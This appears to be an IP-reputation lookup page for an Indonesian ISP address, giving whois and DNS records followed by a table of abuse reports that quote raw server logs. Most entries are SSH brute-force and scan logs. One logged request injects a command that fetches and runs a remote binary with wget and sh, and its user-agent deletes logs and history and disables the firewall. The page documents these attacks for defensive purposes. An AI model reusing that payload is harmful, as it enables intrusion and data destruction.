City: unknown
Region: unknown
Country: Indonesia
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
% Information related to '58.65.240.0 - 58.65.247.255'
% Abuse contact for '58.65.240.0 - 58.65.247.255' is 'abuse@isat.net.id'
inetnum: 58.65.240.0 - 58.65.247.255
netname: ISATNET-ID
descr: PT Insan Sarana Telematika
descr: Internet Service Provider
descr: DKI Jakarta
country: ID
admin-c: IH777-AP
tech-c: FC448-AP
status: ALLOCATED PORTABLE
remarks: Send Spam& Abuse report to: abuse@isat.net.id
mnt-by: MNT-APJII-ID
mnt-lower: MAINT-ID-ISATNET
mnt-routes: MAINT-ID-ISATNET
mnt-irt: IRT-ISATNET-ID
last-modified: 2011-05-16T07:42:01Z
source: APNIC
irt: IRT-ISATNET-ID
address: PT.Insan Sarana Telematika
address: Jl. U No.84A Kemanggisan
address: Jakarta Barat - 11480
e-mail: abuse@isat.net.id
abuse-mailbox: abuse@isat.net.id
admin-c: FC448-AP
tech-c: SC1498-AP
auth: # Filtered
mnt-by: MAINT-ID-ISATNET
last-modified: 2026-03-09T15:38:42Z
source: APNIC
role: ISATNET HOSTMASTERS
address: PT. Insan Sarana Telematika
address: Jl. Daan Mogot 1 no.34, Grogol
address: DKI Jakarta
country: ID
phone: +62-21-569-71156
fax-no: +62-21-569-71156
e-mail: support@isat.net.id
remarks: spam and abuse report : abuse@isat.net.id
remarks: technical and routing : support@isat.net.id
admin-c: SC1498-AP
tech-c: KG168-AP
nic-hdl: IH777-AP
remarks: ISATNET Hostmasters Role Object
notify: support@isat.net.id
mnt-by: MAINT-ID-ISATNET
last-modified: 2011-05-05T10:32:02Z
source: APNIC
person: Fredy Candra
address: PT Insan Sarana Telematika
address: Jl. Daan Mogot 1 no.34, Grogol
address: DKI Jakarta
country: ID
phone: +62-21-564-3233
fax-no: +62-21-569-71172
e-mail: fredy@isat.net.id
nic-hdl: FC448-AP
mnt-by: MAINT-ID-ISATNET
last-modified: 2011-05-05T09:52:00Z
source: APNIC
% Information related to '58.65.241.0/24AS24535'
route: 58.65.241.0/24
descr: Route object of ISATNET
descr: ISP
descr: Jakarta
origin: AS24535
country: ID
mnt-by: MAINT-ID-ISATNET
last-modified: 2011-08-05T02:47:23Z
source: APNIC
% Information related to '58.65.241.0 - 58.65.241.255'
inetnum: 58.65.241.0 - 58.65.241.255
netname: ISATNET-3G-CORPORATE
country: ID
descr: ISATNET 3G CORPORATE
descr: MOBILE USER
admin-c: FC448-AP
tech-c: IH777-AP
status: ASSIGNED NON-PORTABLE
mnt-by: MAINT-ID-ISATNET
last-modified: 2008-09-04T07:22:10Z
source: IDNIC
role: ISATNET HOSTMASTERS
address: PT. Insan Sarana Telematika
address: Jl. Daan Mogot 1 no.34, Grogol
address: DKI Jakarta
country: ID
phone: +62-21-569-71156
fax-no: +62-21-569-71156
e-mail: support@isat.net.id
remarks: spam and abuse report : abuse@isat.net.id
remarks: technical and routing : support@isat.net.id
admin-c: SC1498-AP
tech-c: KG168-AP
nic-hdl: IH777-AP
remarks: ISATNET Hostmasters Role Object
notify: support@isat.net.id
mnt-by: MAINT-ID-ISATNET
last-modified: 2011-05-05T10:32:02Z
source: IDNIC
person: Fredy Candra
address: PT Insan Sarana Telematika
address: Jl. Daan Mogot 1 no.34, Grogol
address: DKI Jakarta
country: ID
phone: +62-21-564-3233
fax-no: +62-21-569-71172
e-mail: fredy@isat.net.id
nic-hdl: FC448-AP
mnt-by: MAINT-ID-ISATNET
last-modified: 2011-05-05T09:52:00Z
source: IDNIC
% Information related to '58.65.241.0/24AS24535'
route: 58.65.241.0/24
descr: Route object of ISATNET
descr: ISP
descr: Jakarta
origin: AS24535
country: ID
mnt-by: MAINT-ID-ISATNET
last-modified: 2011-08-05T02:47:23Z
source: IDNIC
% This query was served by the APNIC Whois Service version 1.88.36-SNAPSHOT (WHOIS-AU5)
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 58.65.241.173
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 38767
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;58.65.241.173. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2026031602 1800 900 604800 86400
;; Query time: 6 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Mar 17 09:00:12 CST 2026
;; MSG SIZE rcvd: 106
173.241.65.58.in-addr.arpa domain name pointer smtp.isat.net.id.
173.241.65.58.in-addr.arpa domain name pointer mail.isat.net.id.
173.241.65.58.in-addr.arpa domain name pointer smtp.multitech-infomedia.co.id.
173.241.65.58.in-addr.arpa domain name pointer mail.multitech-infomedia.co.id.
173.241.65.58.in-addr.arpa domain name pointer hosting.multitech-infomedia.co.id.
Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
173.241.65.58.in-addr.arpa name = mail.isat.net.id.
173.241.65.58.in-addr.arpa name = smtp.isat.net.id.
173.241.65.58.in-addr.arpa name = mail.multitech-infomedia.co.id.
173.241.65.58.in-addr.arpa name = hosting.multitech-infomedia.co.id.
173.241.65.58.in-addr.arpa name = smtp.multitech-infomedia.co.id.
Authoritative answers can be found from:
| IP | Type | Details | Datetime |
|---|---|---|---|
| 162.247.74.217 | attackbotsspam | Unauthorized access detected from banned ip |
2019-07-17 11:14:36 |
| 117.40.188.142 | attackbots | May 4 05:35:55 server sshd\[71351\]: Invalid user anna from 117.40.188.142 May 4 05:35:55 server sshd\[71351\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.40.188.142 May 4 05:35:57 server sshd\[71351\]: Failed password for invalid user anna from 117.40.188.142 port 65384 ssh2 ... |
2019-07-17 11:31:03 |
| 117.247.191.18 | attackbots | Jun 25 03:03:54 server sshd\[131845\]: Invalid user solr from 117.247.191.18 Jun 25 03:03:54 server sshd\[131845\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.247.191.18 Jun 25 03:03:56 server sshd\[131845\]: Failed password for invalid user solr from 117.247.191.18 port 38676 ssh2 ... |
2019-07-17 11:39:29 |
| 106.12.215.87 | attackbots | 106.12.215.87 - - [16/Jul/2019:23:03:55 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.203.234/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;" ... |
2019-07-17 11:14:20 |
| 117.239.242.106 | attack | Jun 8 23:30:35 server sshd\[92373\]: Invalid user design from 117.239.242.106 Jun 8 23:30:35 server sshd\[92373\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.239.242.106 Jun 8 23:30:36 server sshd\[92373\]: Failed password for invalid user design from 117.239.242.106 port 38966 ssh2 ... |
2019-07-17 11:41:47 |
| 118.163.107.56 | attackbotsspam | Jul 16 23:18:13 sshgateway sshd\[15644\]: Invalid user ftptest from 118.163.107.56 Jul 16 23:18:13 sshgateway sshd\[15644\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.163.107.56 Jul 16 23:18:15 sshgateway sshd\[15644\]: Failed password for invalid user ftptest from 118.163.107.56 port 57868 ssh2 |
2019-07-17 11:11:42 |
| 116.62.217.151 | attackbots | 16.07.2019 22:00:40 Recursive DNS scan |
2019-07-17 11:08:03 |
| 104.152.52.36 | attackbotsspam | Jul 17 00:04:59 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:50:56:3c:4d:20:28:99:3a:4d:23:91:08:00 SRC=104.152.52.36 DST=213.136.73.128 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=63094 PROTO=TCP SPT=54699 DPT=6000 WINDOW=1024 RES=0x00 SYN URGP=0 Jul 17 00:05:01 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:50:56:3c:4d:20:28:99:3a:4d:23:91:08:00 SRC=104.152.52.36 DST=213.136.73.128 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=990 PROTO=TCP SPT=54699 DPT=8009 WINDOW=1024 RES=0x00 SYN URGP=0 Jul 17 00:05:02 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:50:56:3c:4d:20:28:99:3a:4d:23:91:08:00 SRC=104.152.52.36 DST=213.136.73.128 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=4075 PROTO=TCP SPT=54699 DPT=138 WINDOW=1024 RES=0x00 SYN URGP=0 Jul 17 00:05:02 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:50:56:3c:4d:20:28:99:3a:4d:23:91:08:00 SRC=104.152.52.36 DST=213.136.73.128 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=46767 PROTO=TCP SPT=54699 DPT=8172 WINDOW=1024 RES=0x00 SYN URGP=0 Jul 17 00:05:02 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00 |
2019-07-17 11:18:52 |
| 117.36.53.108 | attack | May 13 17:59:10 server sshd\[165237\]: Invalid user butter from 117.36.53.108 May 13 17:59:10 server sshd\[165237\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.36.53.108 May 13 17:59:12 server sshd\[165237\]: Failed password for invalid user butter from 117.36.53.108 port 22885 ssh2 ... |
2019-07-17 11:31:35 |
| 117.255.216.116 | attackbots | May 5 03:15:55 server sshd\[104758\]: Invalid user vmadmin from 117.255.216.116 May 5 03:15:55 server sshd\[104758\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.255.216.116 May 5 03:15:56 server sshd\[104758\]: Failed password for invalid user vmadmin from 117.255.216.116 port 48952 ssh2 ... |
2019-07-17 11:36:02 |
| 180.250.162.9 | attack | 16.07.2019 22:16:35 SSH access blocked by firewall |
2019-07-17 11:19:35 |
| 50.236.62.30 | attack | 2019-07-17T03:09:05.097000abusebot-7.cloudsearch.cf sshd\[13737\]: Invalid user teamspeak from 50.236.62.30 port 53380 |
2019-07-17 11:35:07 |
| 181.115.181.198 | attackspam | Automatic report - Port Scan Attack |
2019-07-17 11:32:00 |
| 117.60.61.236 | attackbots | Apr 20 19:47:49 server sshd\[230798\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.60.61.236 user=root Apr 20 19:47:51 server sshd\[230798\]: Failed password for root from 117.60.61.236 port 2418 ssh2 Apr 20 19:48:03 server sshd\[230798\]: Failed password for root from 117.60.61.236 port 2418 ssh2 ... |
2019-07-17 11:21:55 |
| 178.46.211.84 | attack | Honeypot attack, port: 23, PTR: PTR record not found |
2019-07-17 11:33:51 |